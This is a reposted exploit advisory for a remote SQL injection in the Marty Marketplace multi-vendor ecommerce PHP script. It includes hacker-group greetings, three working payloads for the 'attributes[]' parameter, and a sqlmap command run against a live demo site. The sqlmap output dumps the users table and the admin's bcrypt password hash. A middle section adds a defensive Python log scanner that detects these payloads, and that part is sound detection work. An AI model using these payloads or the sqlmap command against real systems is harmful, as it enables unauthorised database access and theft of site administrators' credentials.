Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070067

Below is a copy:

Marty Marketplace Multi Vendor Ecommerce Script 1.2 SQL Injection
Author   : CraCkEr
Website  : sangvish.com
Vendor   : SangVish Technologies
Software : Marty Marketplace Multi Vendor Ecommerce Script v1.2
           (Open Source Marketplace PHP script for eCommerce marketplace platforms in the market)
Vuln Type: Remote SQL Injection
Method   : GET
Impact   : Database Access

B4nks-NET irc.b4nks.tk #unix

Release Notes:

Typically used for remotely exploitable vulnerabilities that can lead to
system compromise.


Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
   loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
       
   CryptoJob (Twitter) twitter.com/CryptozJob
   
   Special Greetz to The Lebanese National Basketball Team for the results of
   the FIBA Asia Cup

                                      CraCkEr 2022                                   


GET parameter 'attributes[]' is vulnerable
---
Parameter: attributes[] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---
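
Seen from the defender's side, the three payload families above all put something other than a plain integer into attributes[]. The scanner below is an added example, not part of the original advisory: it flags such values in web server logs and labels them with the technique names sqlmap reports. The Apache combined log format, the /products path, the client addresses and the sample log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Markers taken from the three payloads in the advisory (labels = sqlmap "Type").
SIGNATURES = [
    ("boolean-based blind", re.compile(r"\bcase\s+when\b", re.I)),
    ("error-based", re.compile(r"\bgtid_subset\s*\(", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
]
# Assumption: Apache combined log format; captures client address and request target.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*"')

# Constructed sample lines (documentation address ranges, hypothetical /products path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2022:10:00:00 +0000] "GET /products?attributes%5B%5D=6 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2022:10:00:05 +0000] "GET /products?attributes%5B%5D=6%20AND%20(SELECT%208488%20FROM%20(SELECT(SLEEP(5)))dSkn) HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2022:10:00:11 +0000] "GET /products?attributes%5B%5D=6%20AND%20GTID_SUBSET(CONCAT(0x71,1),8162) HTTP/1.1" 500 310',
    '198.51.100.7 - - [01/Jul/2022:10:00:12 +0000] "GET /products?attributes[]=(SELECT%20(CASE%20WHEN%20(6997=6997)%20THEN%206%20ELSE%200%20END)) HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jul/2022:10:01:00 +0000] "GET /products?attributes%5B%5D=abc HTTP/1.1" 200 5120',
]

def classify(value):
    """Return None for a plain integer id, otherwise a label for the anomaly."""
    if re.fullmatch(r"[0-9]{1,10}", value):
        return None
    for label, rx in SIGNATURES:
        if rx.search(value):
            return label
    return "non-integer value"

def scan(lines, param="attributes[]"):
    """Return (client, label) for every suspicious value of `param` in the log."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl percent-decodes names and values, so attributes%5B%5D matches too.
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            if name == param and classify(value):
                findings.append((client, classify(value)))
    return findings

if __name__ == "__main__":
    for client, label in scan(SAMPLE_LOG):
        print(client, label)
```

The same integer-only allow-list, applied server-side before the query is built and combined with bound parameters, closes the injection point itself.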


Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6


[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch


[+] fetching current database

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'


[+] fetching tables for database: 'garudan_buy2marty'

Database: garudan_buy2marty
[105 tables]



[+] fetching columns for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[15 columns]

+-------------------+---------------------+
| Column            | Type                |
+-------------------+---------------------+
| avatar_id         | int(10) unsigned    |
| created_at        | timestamp           |
| email             | varchar(191)        |
| email_verified_at | timestamp           |
| first_name        | varchar(191)        |
| id                | bigint(20) unsigned |
| last_login        | timestamp           |
| last_name         | varchar(191)        |
| manage_supers     | tinyint(1)          |
| password          | varchar(191)        |
| permissions       | text                |
| remember_token    | varchar(100)        |
| super_user        | tinyint(1)          |
| updated_at        | timestamp           |
| username          | varchar(60)         |
+-------------------+---------------------+


[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[1 entry]

+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password                                                     | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |
+----+----------+--------------------------------------------------------------+------------+-------------+
                 Possible algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done
